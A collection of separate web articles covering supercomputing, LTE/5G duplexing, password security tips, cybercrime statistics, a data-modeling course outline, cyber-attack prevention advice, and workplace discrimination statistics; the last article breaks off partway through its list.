With the increase of attacks and data breaches occurring, it is important that company, customer, and employee data all be protected. To do this, businesses need to establish a strong cybersecurity posture that includes cybersecurity best practices, software, and employee education on the importance of data protection. | <urn:uuid:5c299947-94b7-4774-b9b4-3998230a41d6> | CC-MAIN-2022-40 | https://dotsecurity.com/insights/blog-what-is-data-security | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334942.88/warc/CC-MAIN-20220926211042-20220927001042-00687.warc.gz | en | 0.943203 | 878 | 2.796875 | 3 |
DOE supercomputers poised to lead next era of innovation
The Department of Energy’s supercomputers are more than simply a matter of national pride; they are an indispensable tool for technological progress and American economic competitiveness.
Over the past 20 years, our determination to maintain our nuclear weapons stockpile without testing drove the DOE to develop computers that could model nuclear processes down to tiny fractions of a second. That meant raising the processing speed of the world’s best computers by a factor of 10,000. Last year we invested $550 million into new high-performance computing (HPC) centers, bringing multiple national laboratories together to increase our computing capabilities a further five- to seven-fold.
These future computers, which are approaching the exascale, will be an entirely new breed. Whereas HPC currently describes computers capable of hundreds of petaflops, or 100 X 1015 floating point operations per second (FLOPS), exascale systems will be capable of 1018 FLOPS, or three orders of magnitude more powerful than the most powerful systems in the world today.
These systems are not only fast, but they handle big data in entirely new way. They open avenues for techniques in artificial intelligence, data science, and simulations that can tease out new insights, and the centers that host them are laying the groundwork for exascale systems. Such systems will be necessary to adequately understand the complexities of cancer and countless other physical processes that can be tailored to vastly improve our world. These include:
We are always looking to improve and evolve these partnerships to maximize HPC’s benefit to both industry and society as a whole
• Investigating the effect of various drugs on the heart.
• Understanding how the ocean responds to climate change.
• Exploring ways to eliminate friction in novel materials.
• Modeling nuclear explosions eliminating the need for real-world testing.
• Exploring our enormous universe in 3D.
Of course supercomputers have long had, and are having a profound impact on the world.
Consider a hospital in Kansas City, Missouri that used HPC to analyze 120 billion DNA sequences, narrowing the cause of an infant’s liver failure to two possible genetic variants; the accurate diagnosis helped save the baby’s life. Or engineers at General Motors who have used supercomputers to simulate crash tests from every angle, test seatbelt and airbag performance, and improve safety. Or, finally, a Philadelphia consortium dedicated to energy efficiency that used high-performance computing to create greener buildings by simulating thermal flows.
Exascale computing will provide capability benefits to a broad range of industries including energy production, pharmaceutical R&D, aircraft and automobile design, and many others, allowing a vast spectrum of industry to more quickly engineer superior products that could improve our nation’s competitiveness. In addition, there are considerable benefits outside of R&D that will result from meeting both the hardware and software challenges posed by HPC. These include enhancements to smaller computer systems and many types of consumer electronics, including smartphones and cameras.
The “trickle down” will affect consumers via smaller and faster devices that use less power and are fault tolerant.
But HPC’s greatest asset is its enabling of simulation—that is, the numerical computations necessary to understand and predict the behavior of scientifically or technologically important systems— to accelerate the pace of innovation.
Simulation has allowed Cummins to build better diesel engines at lower costs, Goodyear to more rapidly design safer tires, Boeing to build more fuel-efficient aircraft, and Procter & Gamble to improve on numerous common household products.
Simulation also accelerates the progress of technologies from laboratory to application, as advanced computers allow for more precise simulations and thus more confident predictions. The best machines today are 10,000 times faster than those of 15 years ago, and the techniques of simulation for science and national security have been drastically improved over this period.
Sustaining and more widely exploiting the U.S. competitive advantage in simulation requires concerted efforts toward two distinct goals: we must continue to push the limits of hardware and software, and U.S. industry must better capture the innovation advantage that simulation offers.
Bringing such innovation to large and small firms in diverse industries, however, requires public-private partnerships to access simulation capabilities largely resident in the nation’s national laboratories and universities. We are always looking to improve and evolve these partnerships to maximize HPC’s benefit to both industry and society as a whole.
When it comes to HPC, the sky is truly the limit. The design and operation of these immense resources are necessary to both keep America competitive and overcome the most daunting scientific challenges the world has to offer. | <urn:uuid:5723261e-bef6-4f78-be6f-5b0dd1672334> | CC-MAIN-2022-40 | https://high-performance-computing.cioreview.com/cxoinsight/doe-supercomputers-poised-to-lead-next-era-of-innovation-nid-26693-cid-84.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335355.2/warc/CC-MAIN-20220929131813-20220929161813-00687.warc.gz | en | 0.919865 | 967 | 3.125 | 3 |
Frequency Division Duplex (FDD) and Time Division Duplex (TDD) are among the most fundamental concepts in all mobile networks, including 4G LTE and 5G NR. Effective use of FDD and TDD in full-duplex and half-duplex modes ensures successful two-way communication.
4G LTE and 5G NR can use both FDD (Frequency Division Duplex) and TDD (Time Division Duplex) and operate in full and half-duplex modes. The FDD and TDD support makes 4G migration easier for 3G technologies on FDD or TDD. TDD enables 5G NR to adjust uplink and downlink resources as required.
What do FDD and TDD mean for mobile networks?
The way the communication works from the mobile phone to the network (uplink) and from the network to the phone (downlink) is determined by the duplex scheme being used. The two key duplex schemes used in mobile communications are Frequency Division Duplex – FDD and Time Division Duplex – TDD. Frequency Division Duplex or FDD is when a mobile network uses two separate frequency bands from the available frequency spectrum as dedicated uplink and downlink bands. Time Division Duplex or TDD is when a mobile network uses one frequency band both for uplink and downlink but separates the communication through different timeslots. I have written a dedicated post on the difference between FDD and TDD in mobile communications and the benefits for both.
What do half-duplex and full-duplex systems mean?
In telecommunications, the systems that can accommodate two-way communication simultaneously are called full-duplex systems, whereas the systems that can facilitate communication in only one direction at a time are called half-duplex systems. Both systems can enable two-way communication.
If you have ever used a walkie-talkie, you may have noticed that communication is done only in one direction at a time. For example, if you want to talk, you usually press the “push to talk” button and speak while the person on the other side listens, and the same can be done in the other direction if the other person wants to speak. This is a typical example of duplex communication, and since the communication is in one direction at a time, it is called half-duplex. If the communication is in both directions simultaneously, it is called full-duplex. Mobile phones and other telephone systems require that communication can take place in both directions simultaneously or at least almost the same time. As a result, mobile phones primarily use full-duplex techniques, but some of the key mobile communications technologies also use half-duplex schemes. There is a direct connection between the two handsets with walkie-talkies, allowing them to communicate directly. On the other hand, mobile phones work differently and first connect with the cellular network to connect with other phones. Duplex schemes play a fundamental role in the connection between the mobile network and the mobile phone.
Half-Duplex and Full-Duplex FDD and TDD in 4G LTE networks
4G LTE networks support FDD and TDD, and both of these duplex schemes in LTE use OFDMA for the downlink and SC-FDMA for the uplink. This approach allows LTE to be the primary cellular technology that allows all key third-generation (3G) technologies to migrate to 4G.
LTE networks provide a 4G migration path to all key 3G technologies, including CDMA2000, and as a result, they must support 4G migration from both FDD and TDD capable 3G networks. FDD – Frequency Division Duplex requires separate frequency bands for uplink and downlink communication where the two bands are paired together and separated by a guard band. TDD – Time Division Duplex uses the same frequency band for uplink and downlink communication. The uplink and downlink are separated in the time domain, i.e., transmitted at different time intervals. LTE also uses a half-duplex version of FDD in which the base station of the mobile network can send and receive simultaneously, but the mobile phone cannot do the same.
The TDD variant of LTE, also known as TD-LTE or LTE TDD, allows mobile operators currently on TDD-based 3G networks to migrate to LTE. TD-SCDMA is a typical example of such technologies used by one of the mobile operators in China for 3G services. TD-SCDMA networks can take the LTE TDD path to migrate to 4G. Since leading 3G technologies UMTS and CDMA2000 are based on the FDD duplex scheme, LTE FDD has been the 4G migration path for these technologies.
The downlink and uplink transmissions in LTE FDD are sent in 10 milliseconds (ms) radio frames. Each frame consists of 10 subframes of 1 ms duration. Each subframe is split into two timeslots of 0.5 ms. Half of the subframes are for uplink and half for downlink in both full and half-duplex.
The downlink and uplink transmission in LTE TDD uses a radio frame of 10 milliseconds (ms). The frame consists of 10 subframes of 1 ms duration divided into two halves, each with five subframes. The subframes can be either uplink or downlink, or special subframes.
In 4G LTE networks, both FDD and TDD, the transmissions are sent in radio frames of 10 milliseconds. Each frame is then divided into ten subframes of 1-millisecond duration. Finally, each subframe is split into two timeslots, each with a duration of 0.5 milliseconds. This is where the TDD and FDD variants of LTE use a slightly different approach. There are two types of frame structures in LTE; type 1 used for FDD and type 2 for TDD, as shown in the diagrams above.
In FDD, half of the subframes are reserved for uplink and half for downlink in both full-duplex and half-duplex. The uplink and downlink bands are separated in the frequency domain using a guard band. In TDD, each radio frame consists of two half-frames and each half-frame consists of five subframes. Subframes can be either uplink or downlink, or special subframes. Special subframes are used when switching from downlink transmission to uplink transmission. This is where the Guard Period (GP) is found, which is the TDD equivalent of a guard band to separate uplink and downlink communication. Special subframes include Downlink Pilot Timeslot (DwPTS), Uplink Pilot Timeslot (UpPTS) and Guard Period (GP).
Half-Duplex and Full-Duplex FDD and TDD in 5G networks
5G NR can operate in both FDD (paired) and TDD (unpaired) using the same radio frame structure for both duplex schemes. LTE employs two distinct frame types; type 1 for FDD and type2 for TDD. The basic radio frame structure of 5G is designed to support both half-duplex and full-duplex communication.
The fifth generation of mobile networks, 5G, uses the New Radio (NR) technology for the air interface. 5G NR networks work closely with existing LTE networks and have two modes of deployment, standalone and non-standalone. 5G NR and 4G LTE are expected to co-exist for a long time.
FDD is full-duplex, whereas TDD and the half-duplex version of FDD are half-duplex systems. While TDD does not technically enable simultaneous communication in both directions (hence half-duplex), it enables concurrent two-way communication that emulates a full-duplex experience. As a result, you will likely come across documentation suggesting that both TDD and FDD are full-duplex.
In order to deal with changing data needs, the higher frequency bands can benefit from TDD by dynamically changing uplink/downlink resource allocation depending on the customer needs. It is also more pragmatic to use TDD for higher frequency bands because those bands are mainly beneficial for deployments in smaller areas such as factories, shopping malls, etc. That way, frequency interference is less of an issue because fewer base stations and devices are needed to plan for. Since 5G NR networks can operate in considerably higher frequency bands (both licensed and unlicensed) than earlier technologies, TDD can be very effective for some of the futuristic use cases of 5G.
4G LTE networks employ both Frequency Division Duplex (FDD) and Time Division Duplex (TDD) to provide a backwards-compatible 4G migration path to all key 3G technologies. 5G NR networks also support both FDD and TDD. Since most futuristic use cases of 5G NR operate at higher frequency bands, TDD is expected to help by offering the flexibility to dynamically adjust downlink/uplink network resources depending on the data needs. Both 4G and 5G support full-duplex and half-duplex modes.
Here are some helpful downloads
Thank you for reading this post. I hope it helped you in developing a better understanding of cellular networks. Sometimes, we need extra support, especially when preparing for a new job, studying a new topic, or buying a new phone. Whatever you are trying to do, here are some downloads that can help you:
Students & fresh graduates: If you are just starting, the complexity of the cellular industry can be a bit overwhelming. But don’t worry, I have created this FREE ebook so you can familiarise yourself with the basics like 3G, 4G etc. As a next step, check out the latest edition of the same ebook with more details on 4G & 5G networks with diagrams. You can then read Mobile Networks Made Easy, which explains the network nodes, e.g., BTS, MSC, GGSN etc.
Professionals: If you are an experienced professional but new to mobile communications, it may seem hard to compete with someone who has a decade of experience in the cellular industry. But not everyone who works in this industry is always up to date on the bigger picture and the challenges considering how quickly the industry evolves. The bigger picture comes from experience, which is why I’ve carefully put together a few slides to get you started in no time. So if you work in sales, marketing, product, project or any other area of business where you need a high-level view, Introduction to Mobile Communications can give you a quick start. Also, here are some templates to help you prepare your own slides on the product overview and product roadmap. | <urn:uuid:509aff73-4a98-4746-8012-129e23fdaee4> | CC-MAIN-2022-40 | https://commsbrief.com/half-duplex-and-full-duplex-fdd-and-tdd-in-4g-lte-and-5g-nr/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337287.87/warc/CC-MAIN-20221002052710-20221002082710-00687.warc.gz | en | 0.922155 | 2,233 | 3.609375 | 4 |
At the end of last year, a survey revealed that the most popular password was still “123456,” followed by “password.” These highly hackable choices are despite years of education around the importance of password security. So, what does this say about people who pick simple passwords? Most likely, they are shooting for a password that is easy to remember rather than super secure.
The urge to pick simple passwords is understandable given the large number of passwords that are required in our modern lives—for banking, social media, and online services, to simply unlocking our phones. But choosing weak passwords can be a major mistake, opening you up to theft and identity fraud.
Even if you choose complicated passwords, the recent rash of corporate data breaches means you could be at even greater risk by repeating passwords across accounts. When you repeat passwords all a hacker needs to do is breach one service provider to obtain a password that can unlock a string of accounts, including your online banking services. These accounts often include identity information, leaving you open to impersonation. The bad guys could open up fraudulent accounts in your name, for example, or even collect your health benefits.
So, now that you know the risks of weak password security, let’s see what your password says about you. Take this quiz to find out, and don’t forget to review our password safety tips below!
Password Quiz – Answer “Yes” or “No”
- Your passwords don’t include your address, birthdate, anniversary, or pet’s name.
- You don’t repeat passwords.
- Your passwords are at least 8 characters long and include numbers, upper and lower case letters, and characters.
- You change default passwords on devices to something hard to guess.
- You routinely lock your phone and devices with a passcode or fingerprint.
- You don’t share your passwords with people you’re dating or friends.
- You use a password manager.
- If you write your passwords down, you keep them hidden in a safe place, where no one else can find them.
- You get creative with answers to security questions to make them harder to guess. For example, instead of naming the city where you grew up, you name your favorite city, so someone who simply reads your social media profile cannot guess the answer.
- You make sure no one is watching when you type in your passwords.
- You try to make your passwords memorable by including phrases that have meaning to you.
- You use multi-factor authentication.
Now, give yourself 1 point for each question you answered “yes” to, and 0 points for each question you answered “no” to. Add them up to see what your password says about you.
You’re a Password Pro!
You take password security seriously and know the importance of using unique, complicated passwords for each account. Want to up your password game? Use multi-factor authentication, if you don’t already. This is when you use more than one method to authenticate your identity before logging in to an account, such as typing in a password, as well as a code that is sent to your phone via text message.
You’re a Passable Passworder
You go through the basics, but when it comes to making your accounts as secure as they can be you sometimes skip important steps. Instead of creating complicated passwords yourself—and struggling to remember them—you may want to use a password manager, and let it do the work for you. Soon, you’ll be a pro!
You’re a Hacker’s Helper
Uh oh! It looks like you’re not taking password security seriously enough to ensure that your accounts and data stay safe. Start by reading through the tips below. It’s never too late to upgrade your passwords, so set aside a little time to boost your security.
Key Tips to Become a Password Pro:
- Always choose unique, complicated passwords—Try to make sure they are at least 8 characters long and include a combination of numbers, letters, and characters. Don’t repeat passwords for critical accounts, like financial and health services, and keep them to yourself.Also, consider using a password manager to help create and store unique passwords for you. This way you don’t have to write passwords down or memorize them. Password managers are sometimes offered as part of security software.
- Make your password memorable—We know that people continue to choose simple passwords because they are easier to remember, but there are tricks to creating complicated and memorable passwords. For instance, you can string random words together that mean something to you, and intersperse them with numbers and characters. Or, you can choose random letters that comprise a pattern only know to you, such as the fist letter in each word of a sentence in your favorite book.
- Use comprehensive security software—Remember, a strong password is just the first line of defense. Back it up with robust security softwarethat can detect and stop known threats, help you browse safely, and protect you from identity theft.
For more great password tips, go here.
Follow us to stay updated on all things McAfee and on top of the latest consumer and mobile security threats. | <urn:uuid:233a4790-77d5-44d1-ade9-88b49af2200d> | CC-MAIN-2022-40 | https://www.mcafee.com/blogs/internet-security/what-your-password-says-about-you/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337421.33/warc/CC-MAIN-20221003133425-20221003163425-00687.warc.gz | en | 0.931742 | 1,121 | 2.75 | 3 |
What if Street Crime Statistics Matched Those of Cybercrime?
If street crime statistics matched those of cybercrime, our world would resemble the Wild West.
Almost 60 million Americans said they were affected by cyber identity theft in 2018. That's one in every 5.4 citizens. FBI statistics show that over 282,000 robberies (thefts) were recorded in the United States during the same period - one for roughly every 1,160 citizens. In other words, you are over 200 times more likely to be a victim of cyber theft than 'traditional' robbery. On a broader level, robberies are included in the FBI’s list of violent crimes, the victims of which number 1.2 million, or around one in every 270 citizens (as opposed to every 5.4).
A further stat shows that "more than 446 million consumer records containing personal information were exposed in data breaches in 2018". A lot of wallets/passports/ID cards need to be stolen to get the same amount of information.
In 2018, the average dollar value of property stolen per reported robbery was $2,119. One set of figures puts the average ransomware payment at over 17 times this amount ($36,295), almost dollar-for-dollar the same amount paid for the average price of a light vehicle in the US ($36,843).
Corporate cybercrime stats are just as disturbing and a business/organisation somewhere in the world is predicted to suffer a ransomware attack every 14 seconds during 2019 (down to 11 seconds by 2021). And it's not only businesses. Cities are becoming the target of hackers, such as Florida's Riviera Beach, Baltimore and the combined attack on 23 towns in Texas. The number of US cities attacked rose from 38 in 2017 to 53 in 2018, and that number is expected to rise with each passing year. Imagine the reaction if armed intruders stormed the city hall of a different US city each week for a year and held that city to ransom.
Gaining physical access to many businesses these days involves security on many levels in order to prevent just anyone from getting past the front door. However, our attitude towards workplace cybercrime prevention can resemble an 'open door' policy, with 66% of cyber breaches caused by employee negligence and malicious acts. It also doesn't help that IT departments are being ignored. One study of 3,000 workers around the world showed that 46% access personal documents on their work device without IT's permission, while a further 41% download professional software and applications. And even though 93% of executives know this behaviour causes issues, 57% have accessed software and apps without IT's knowledge.
THE COST OF CYBERCRIME
Some of the world's biggest 'traditional' heists and robberies netted spoils that soared into the hundreds of millions of dollars, with one - the Central Bank of Iraq 'heist' in 2003 - exceeding $1.3 billion in today's money. In comparison, the 'revenue' of cybercrime is stratospheric and some (global) figures for 2018 go as high as $1.5 trillion. If this is the case and cybercrime was a country, it would have the 13th highest GDP in the world.
Even conservative estimates for annual cybercrime revenue, like the $600 billion - which would have a 'country GDP' ranking of around 21 - figure from the Center for Strategic and International Studies, far exceeds anything achieved pre-cyber. One of the most notorious band of cyber thieves - those behind the Gandcrab ransomware - announced their intention to retire in May, 2019, after stealing in excess of $2 billion. Part of their farewell statement read: "We are a living proof that you can do evil and get off scot-free. We are getting a well-deserved retirement."
Nearly all the perpetrators behind the biggest traditional heists have been caught. Cybercrime, on the other hand, is a faceless crime. There is an attacker - someone (or more) to blame - but they are out of sight and rarely caught, usually because they are behind a computer outside the legal jurisdiction where the crime has occurred. Even when evidence has been gathered, there is often no way to arrest the person/s involved because some countries won't participate in reciprocal legal - extradition - agreements.
Countries that refuse to have reciprocal agreements often do so for their own good reason and this is where the Pandora's box that is state-sponsored cybercrime (attack/warfare/terrorism) is opened. Everyone does it and some (you choose which) spring to mind moreso than others. Many say it all began with what is referred to as the world's 'first digital weapon': Stuxnet. Countries have been cyber-attacking one another since the internet first appeared, but Stuxnet took cybercrime (warfare) to new heights, and countries have been conducting tit-for-tat attacks on each other ever since, while doing their utmost to protect the identity of those working on their behalf.
WHO IS ACCOUNTABLE?
Cybercrime victims around the world are much the same. Statistically, they are consumers who use numerous devices and are likely to use the same password across their accounts, or share this info with others. However, even after an attack, around a quarter of US cybercrime victims still use the same online password and 60% share their passwords with others for at least one device or account (if someone breaks into your house, you change the locks and don't hand out your keypad details to every Tom, Dick and Harriet). Despite this, nearly 40% of victims believe they can protect their data from future attack and 33% believed they would be a low risk of becoming a cybercrime victim again.
These beliefs show that, despite the increasing regularity of cyber attacks, many people think "it won't happen to me" and avoid taking the most basic cyber security precautions such as changing passwords. Perhaps it's because cybercrime happens 'out there' and we aren't physically or, for the most part, psychologically violated like 'old school' robbery. If your data is stolen, it is often done so with thousands, or millions, of others. What are the odds of you being singled out and compromised?
Often it is a mere annoyance. Even 'yours truly' was the victim of an online tax office scam that saw personal data handed over in a distracted moment. The error of my ways were realised within seconds of hitting 'Send' and the relevant organisations were contacted immediately and details updated/changed. Nothing more came of it. Life went on.
Of course, this isn't always the case. However, stats show that, amidst all this cybercrime from outside sources, we should take a good look at ourselves. Over 80% of US adults believe cybercrime should be treated as a criminal act, yet nearly 25% believe stealing information online is not as bad as stealing property in real life. A further 41% believe it's acceptable to commit "morally questionable behaviour" in certain instances, such as reading someone's emails (28%), using a false email or someone else's email to identify their self online (20%) and even accessing someone's financial accounts without their permission (18%).
Cybercrime stories on a global scale and with big statistics – WannaCry infected 300,000 computers across 150 countries, with damage reaching into the billions of dollars – fill the headlines and news bulletins. We are shocked at the scale of these but, once the furore dies down and the next big story in our 24/7 news cycle takes over, we move on. These stories are usually portrayed by a shadowy - sinister, even - figure hunched over a laptop in a darkened room. Such imagery might make us feel vulnerable, but are we becoming increasingly immune to cybercrime with each passing story, just as we've become immune to all but the most graphic street crime stories? The answer is, inevitably, yes.
. . .
If you want to stay notified of vulnerabilities that affect you, register for a weekly security report customised to your stack. | <urn:uuid:7c024ecf-220a-47b9-b5e8-d913758fa8d0> | CC-MAIN-2022-40 | https://secalerts.co/article/what-if-street-crime-statistics-matched-those-of-cybercrime/bcc857ea | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00687.warc.gz | en | 0.96345 | 1,658 | 2.5625 | 3 |
Maxtrain.com - [email protected] - 513-322-8888 - 866-595-6863
The methodologies discussed are applicable to any relational database environment, including IBM DB2, the Oracle database, Microsoft SQL Server, the open-source MySQL and PostgreSQL databases as well as other RDBMS platforms. They are also applicable to other database technologies, such as object databases and legacy IMS and IDMS databases. Finally, while we use the free Oracle SQL Developer Data Modeler product as a demonstration modeling tool, one can complete the exercises of this course and apply the techniques learned using any other popular data model diagramming tool, such as IBM InfoSphere Data Architect, CA ErWin Data Modeler, Embarcadero ER/Studio and others.
In the workshop exercises you will build an increasingly complex series of data models, and will critique and correct other models. A summary of the detailed objectives of this textbook are:
• A review of model-based design, including process modeling, physical data modeling and other modeling techniques which relate to logical data modeling.
• A comparison of data modeling concepts and theories, including top-down data modeling, bottom-up data modeling, data normalization, object-oriented and semantic modeling.
• Hints, tips and guidelines in identifying entities, attributes and relationships which should appear within a data model.
• Review the popular commercial data modeling tools commonly in use today.
• The benefits of building a conceptual data model in advance of the logical model.
• Learn to find and fix well-known mistakes which can exist in relationship definitions, finding missing attributes and correcting erroneous attribute definitions.
• Review a recommended strategy for unique identifiers.
• Using semantic modeling constructs and techniques such as supertypes, subtypes, generalization, specialization, constraints, lattices and arcs.
• Using object-oriented modeling techniques such as domains, attribute classes, extended types and abstraction of attributes.
• Time-dependency and state-dependency within a data model.
• Explore classic structures and modeling patterns, including many-to-many recursion.
• Steps and available options for engineering a physical data model from a logical model.
• Reverse engineering and forward engineering of a physical data model into an implementation relational database.
No mandatory prerequisites exist for this course. However a basic knowledge of computer systems, business systems requirements and database technologies is helpful.
The primary target audiences for this course are:
3 Days Course | <urn:uuid:d45b1125-e365-48dd-9494-168ce8390a47> | CC-MAIN-2022-40 | https://maxtrain.com/product/data-modeling-workshop/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00687.warc.gz | en | 0.866474 | 512 | 2.6875 | 3 |
7 Steps Businesses Can Take to Prevent Cyber Attacks
While organizations continue their full-scale integration within the digital world, hackers are targeting companies that aren’t fully secure. As a result, $2.9 million is lost every minute due to cyber crime, and your customers are relying on you to have an impenetrable defense against it.
With cyber attacks increasing 300% since the start of the pandemic, it’s vital for businesses to analyze their vulnerabilities to prevent a crisis. Knowing the tools and practices used by hackers is important in taking preventative measures.
Common Types of Cyber Attacks:
- Phishing: 22% of cyber attacks
- Malware: 94% delivered by email
- Distributed Denial of Service (DDos): Will increase to more than 15 million attacks in a few years
By 2025, damage done by cyber attacks could hit more than $10 trillion globally.
Industries often targeted:
- Healthcare: More than 90% of companies have had a cyber attack
- Finance: Average cost of a cyber attack is $5 million
- Government: Nearly $20 billion went to a cyber security budget in 2021
Here are 7 steps you can take to prevent cyber attacks on your protected data:
- 50% of Americans don’t know what to do in the event of a cyber attack.
- Non-technical employees are the first line of defense. They need to be trained in cyber security awareness and where to look for vulnerabilities.
- Train a human firewall. This is a group of employees tasked with defending company data, to fill the gaps where a security system might be curtailed.
- 50% of companies increased their security after conducting Red & Blue Team exercises.
- Red Teams perform penetration tests to pinpoint weaknesses and vulnerabilities. In 2020, 97% of companies using penetration testing said it was important to security.
- Blue Teams are responsible for threat hunting, digital forensics, and crisis handling.In a survey conducted by Exabeam, 96% of companies reported they are performing blue team tests.
- Firewalls ensure protection of a network by blocking unauthorized traffic to sensitive information.
- By acting as a filter between networks and logging malicious traffic, firewalls help prevent breaches.
- The chance of a cyber attack increases by 65% when you don't have firewall protection.
- In 2019, businesses were facing ransomware attacks every 14 seconds.
- 60% of businesses affected by data loss shutdown less than six months later.
- Cloud data backup ensures a cost-effective, more robust measure to protect data.
- 95% of security breaches are a result of human error.
- Not all employees should have equal access to sensitive data.
- 66% of people said they use the same password on a variety of accounts.
- Using the same password across multiple platforms leads to increased vulnerability.
- New passwords should be created and updated frequently.
- Giving everyone their own account ensures less access points.
- Only give employees access to files that pertain to their job. | <urn:uuid:f948db3a-1a57-4331-b80f-010e9654c0a5> | CC-MAIN-2022-40 | https://ine.com/blog/7-steps-businesses-can-take-to-prevent-cyber-attacks | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334596.27/warc/CC-MAIN-20220925193816-20220925223816-00087.warc.gz | en | 0.943583 | 630 | 2.59375 | 3 |
Workplace discrimination statistics have been in the spotlight during the past decade. The Title VII of the Civil Rights Act of 1964 protects workers from employment discrimination based on age, gender, race, religion, disability, or national origin.
Employers owning a company of 15 or more people aren’t allowed to use any of these categories as a reason to mistreat people, pay them less, fire them, or avoid hiring them.
Despite this Act’s seriousness, people worldwide are still discriminated against and harassed based on some of the categories specified above. In fact, racial and sexual orientation are among the most common drivers of discrimination.
Let’s take a look at some of the more severe types of discrimination in the workplace:
8 Discrimination in the Workplace Statistics That Might Make You Uncomfortable (Editor’s Choice)
- 40% of US women have faced gender-related discrimination in their careers.
- 42% of US employees confirm they have faced or witnessed workplace racism and sexism.
- The average settlement for EEOC claims on religious discrimination is around $40,000–$50,000.
- Disabled employees earn about $9,000 less per year than non-disabled employees
- 48 states have enforced equal pay laws, regardless of the employees’ gender.
- Only 26 states see progress in hiring people with disabilities.
- 25% of Black job applicants receive callbacks for whitened resumes.
- Over 20% of employees have faced age-related discrimination in the workplace.
Gender Discrimination in the Workplace Statistics
Gender discrimination in the workplace means that an employee or an applicant is treated differently or less politely because of their gender. That includes hiring bias (not being hired), being paid less or evaluated more harshly, being passed over for a promotion or training opportunities, and much more.
Transgender people are often workplace discrimination victims because they are the most vulnerable category.
1. 4 out of 10 women in the United States confirm they have faced discrimination at a certain point in their career because of their gender.
(Pew Research Center)
Statistics on discrimination in the workplace point out that 42% of working women in the US have experienced some type of discrimination in the workplace because of their gender. Sometimes it is pay discrimination (they earn less than men despite doing the same job) or aren’t given a chance for promotion and are being passed over for important assignments. On the other hand, 22% of men have experienced at least one of eight forms of gender discrimination at work.
2. Discrimination in the workplace statistics shows that EEOC has received more than 50,000 pregnancy discrimination claims in the last decade.
Women make up nearly 50% of the US workforce, and more than 85% of them will become mothers during their careers. It is alarming that pregnancy discrimination continues to limit their opportunities for advancement. On top of that, one of the most disturbing discrimination facts is that many employers say it is necessary to ask if a woman has young children during the hiring process.
3. Pay discrimination data confirm that 48 US states have enforced equal pay laws for employees of all genders to improve female discrimination in the workplace statistics.
Although all employers have to follow federal laws regarding pay discrimination in the workplace, specific state laws can vary significantly depending on the region. For example, Alabama and Mississippi haven’t enforced laws yet, and Georgia’s law affects only businesses with 10 or more employees. Despite this, discrimination reports show that the situation with workplace discrimination and harassment hasn’t changed much.
4. Transgender discrimination in the workplace statistics show that nearly 25% out of 90% of discriminated transgender workers were told to use bathrooms not matching their gender identity.
Transgender people are also under the protection of the Title VII of the Civil Rights Act of 1964. Despite this, they have reported several mistreatment issues, like prejudice in the workplace, harassment by coworkers, missed promotion opportunities, and have even experienced physical violence and sexual assault.
5. Statistics about discrimination show that 74% of Black men have experienced discrimination in the workplace.
(Pew Research Center)
Moreover, 14% of them have regularly experienced work discrimination and workplace racism, while 60% experienced it occasionally. On the other hand, 9% of women reported regularly experiencing racial discrimination, while 59% of them were discriminated against once in a while. Discrimination is more common among Blacks with at least some college education; 81% have experienced it at least occasionally, while 13% experienced bigotry regularly.
Racial Discrimination in the Workplace Statistics
Racism in the workplace can be an uncomfortable subject for many. Even though 93% of white employees don’t think racial intolerance and discrimination exists in their workplace, it has happened to their colleagues. Here are some statistics that will give you a better idea of how often and to whom chauvinism is a severe workplace issue.
6. Employment statistics by race reveal that 75% of Black people were discriminated against in the workplace.
Moreover, 61% of Hispanic and 42% of White workers experienced discrimination at work. On top of that, discrimination data shows that Black and Hispanic employees get paid less than White workers, regardless of their education level. In 2019, Black employees with advanced degrees earned 82.4% of the payment of White workers with advanced degrees.
7. 42% of employees in the US have witnessed or experienced racism in the workplace.
For some individuals, racial harassment in the workplace is a daily occurrence. Workplace stress statistics show that situations like these could lead to a risk of anxiety, depression, and post-traumatic stress disorder. Moreover, it can have severe effects on the person’s self-esteem and well-being in general.
8. Employment discrimination statistics show that that 25% of Black job applicants receive callbacks for whitened resumes.
(Harvard Business School)
Many people of color might feel the need to whiten their resumes, which means changing their names, modifying or erasing work experiences that might hint at the person representing a minority status, and similar.
In recent hiring discrimination survey that included black job applicants, only 10% received callbacks for resumes with ethnic details. Regarding Asian applicants, 21% received callbacks for whitened resumes, whereas only 11.5% received callbacks for their real resumes.
9. In 2020, ethnic minorities had an unemployment rate of 12.9%.
(Equality and Human Rights Commission)
Moreover, work discrimination facts show that White people had a rate of only 6.3%. Black employees with a degree earned approximately 23.1% less than White people, while Black workers who left school with A-levels were usually paid 14.3% less than their White colleagues.
These are alarming facts. No matter how much they try, ethnic minorities cant reach employment levels and pay grades of White people. They must feel so discouraged.
Religious Discrimination in the Workplace Statistics
Title VII also protects individuals from being discriminated against based on their religious views. Additionally, it protects employees or applicants from discrimination and harassment if they don’t belong to any religious group and proclaim themselves as atheists.
Recent employment discrimination cases show that religious discrimination also includes treating employees or applicants differently because their spouse or partner is involved in a particular religion, or due to their connection with a religious group.
10. Muslims and atheists are more likely to be discriminated against in the US.
(University of Washington)
The US is a culturally diverse society, today much more than in the past. Therefore, the rate of change is happening very fast. Workplace discrimination statistics show Muslims often suffer prejudice at work, whether it is the hijab women wear or associating terrorism with the Muslim religion.
Atheists are often discriminated against because they don’t belong to a religious group, especially if most employees in the company or a boss are a part of one.
11. 82% of Muslims are subject to some discrimination.
(Pew Research Center)
Furthermore, occupational discrimination stats show that 63% of US adults say that being a Muslim may hurt someone’s chances for advancement at the workplace or in American society in general, while 31% say it can hurt their chances a lot.
12. US citizens believe that Muslims are two times more likely to be discriminated against and harassed at work than atheists, Jewish, and Mormons.
EEOC complaint statistics show that Muslims, Jews, and Mormons have faced much discrimination at work. Many got dismissed because of their religion. Others weren’t hired or given a chance to be promoted. Some even claim that they have received a lower wage because of their religious beliefs.
13. In 56 countries in the world, women get frequently harassed at work because of their religious clothing style.
(Pew Research Center)
